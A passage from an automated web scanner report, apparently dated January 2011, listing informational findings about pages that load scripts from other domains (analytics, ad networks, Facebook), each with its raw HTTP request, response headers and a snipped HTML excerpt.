
The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 352408000473833862436b9fb7dcdeb1=6df78a54dbe3289d598ffc0f146b9b17; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<!-- Load jQuery remotely -->
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.298. http://lesterchan.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lesterchan.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://stats.wordpress.com/e-201104.js

Request

GET / HTTP/1.1
Host: lesterchan.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 SVN/1.6.15 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://lesterchan.net/xmlrpc.php
Set-Cookie: PHPSESSID=4c415ee2862c176ec82733815b99874f; path=/
Set-Cookie: wpthisvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_posts=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_comments=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Lester Chan
...[SNIP]...
</script> <script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

21.299. http://linux.maruhn.com/directory.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linux.maruhn.com
Path:   /directory.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /directory.html HTTP/1.1
Host: linux.maruhn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:34:05 GMT
Server: Apache/1.3.34 (Debian)
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 21:34:05 GMT
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 4100
Content-Length: 10591
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

21.300. http://linux.maruhn.com/sec/aub.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linux.maruhn.com
Path:   /sec/aub.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sec/aub.html HTTP/1.1
Host: linux.maruhn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:54:32 GMT
Server: Apache/1.3.34 (Debian)
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 14:54:32 GMT
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.301. http://linux.maruhn.com/sec/aub.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linux.maruhn.com
Path:   /sec/aub.html/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sec/aub.html/x22 HTTP/1.1
Host: linux.maruhn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 22:04:40 GMT
Server: Apache/1.3.34 (Debian)
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:04:40 GMT
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 2254
Content-Length: 79871
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.302. http://loadus.exelator.com/load/net.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
Content-Type: text/html
Date: Mon, 24 Jan 2011 21:07:10 GMT
Server: HTTP server
Content-Length: 368

<HTML><BODY><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=49,123" width="0" height="0" border="0"></img><script src="http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js"></script>
...[SNIP]...

21.303. http://mad4milk.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mad4milk.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:46 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bb984950eed1af353727ed1e76937777%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1295908788%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Tue, 25-Jan-2011 00:39:48 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/assets/styles/style.css" />
   
   <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

21.304. http://magazine.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://magazine.joomla.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: magazine.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: C8H10N4O2
X-Powered-By: TMX-194.19
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e4ca47a488ed5dc0028ed0df7e92e4e0=9b4bdea32449b3b75368de62daaab55e; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<!-- Load Mootools from Google -->
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- JoomlaWorks "Google Ad Manager" Plugin (v1.0) starts here -->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.305. http://media.fastclick.net/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/pg

Issue detail

The response dynamically includes the following script from another domain:
  • https://www.googleadservices.com/pagead/conversion.js

Request

GET /w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 929
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

<html><body><img alt="." src="https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914" />

<img src="https://ad.yieldmanager.com/pixel?id=938566&t=2" width="1" height="1" />

<!-- Google
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.306. http://netlingo.com/feedback.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netlingo.com
Path:   /feedback.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /feedback.php HTTP/1.1
Host: netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:21:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.307. http://network4g.verizonwireless.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network4g.verizonwireless.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js
  • https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js
  • https://scache.vzw.com/globalnav/globalnav.js
  • https://scache.vzw.com/scripts/accessible/mootools.js
  • https://scache.vzw.com/scripts/homepage/swfobject.js

Request

GET / HTTP/1.1
Host: network4g.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.14
X-Pingback: http://network4g.verizonwireless.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 14:25:14 GMT
Content-Length: 9172
Connection: close

...<!DOCTYPE html>
<html    xmlns="http://www.w3.org/1999/xhtml"
       xmlns:og="http://opengraphprotocol.org/schema/"
       xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" dir="ltr" lang="en-US">
...[SNIP]...
<![endif]-->
   
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...

21.308. http://news.cnet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.cnet.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://b.scorecardresearch.com/beacon.js
  • http://dw.com.com/js/dw.js
  • http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
  • http://i.i.com.com/cnwk.1d/html/pt/pt2.js
  • http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.r2d2.compressed.js
  • http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
  • http://i.i.com.com/cnwk.1d/html/rb/js/tron/special/special.riverTwitterAd.compressed.js
  • http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78
  • http://tcr.tynt.com/javascripts/Tracer.js?user=cry3Q6LBqr37zJadbi-bnq

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:25:29 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Tue, 25 Jan 2011 14:26:59 GMT
Age: 30
Content-Type: text/html; charset=UTF-8
Set-Cookie: tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
Set-Cookie: arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Thu, 24-Feb-2011 14:25:29 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=120
Keep-Alive: timeout=15, max=932
Connection: Keep-Alive
Content-Length: 84113

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Technolog
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/news/newFrontDoor.css"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.r2d2.compressed.js"></script>
...[SNIP]...
<!-- MAC ad --> <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
</li>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/special/special.riverTwitterAd.compressed.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
<!-- PRINT TRACKER --> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...
<!-- DOM closed --> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cry3Q6LBqr37zJadbi-bnq"></script>
...[SNIP]...

21.309. http://nget.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nget.sourceforge.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: nget.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:46:09 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 06 Apr 2006 02:34:34 GMT
ETag: "11cd-410b9fb108280"
Accept-Ranges: bytes
Content-Length: 4557
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:46:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>nget @ sourceforge</title>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-
...[SNIP]...
</a>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.310. http://openports.se/news/aub/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openports.se
Path:   /news/aub/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/aub/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.311. http://pan.rebelbase.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pan.rebelbase.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: pan.rebelbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 06 Aug 2010 04:10:25 GMT
ETag: "11711dc-6b23-d8a46e40"
Accept-Ranges: bytes
Content-Length: 27427
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>Pan - A GTK+ Newsreader</title>
   <link rel="stylesheet" type="text/css" href="/default.css" />
</head>
<body style=
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.312. http://people.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://connect.facebook.net/en_US/all.js

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

21.313. http://picasaweb.google.com/lh/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The response dynamically includes the following script from another domain:
  • http://lh3.ggpht.com/s/v/70.22/script/lh_searchview.js

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Date: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=2G37cRlHow3m; Path=/; HttpOnly
Set-Cookie: S=photos_html=e_GKwX1V91oIY6PpezhLDA; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/70.22/script/lh_searchview.js"></script>
...[SNIP]...

21.314. http://powersportsnetwork.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://powersportsnetwork.com
Path:   /

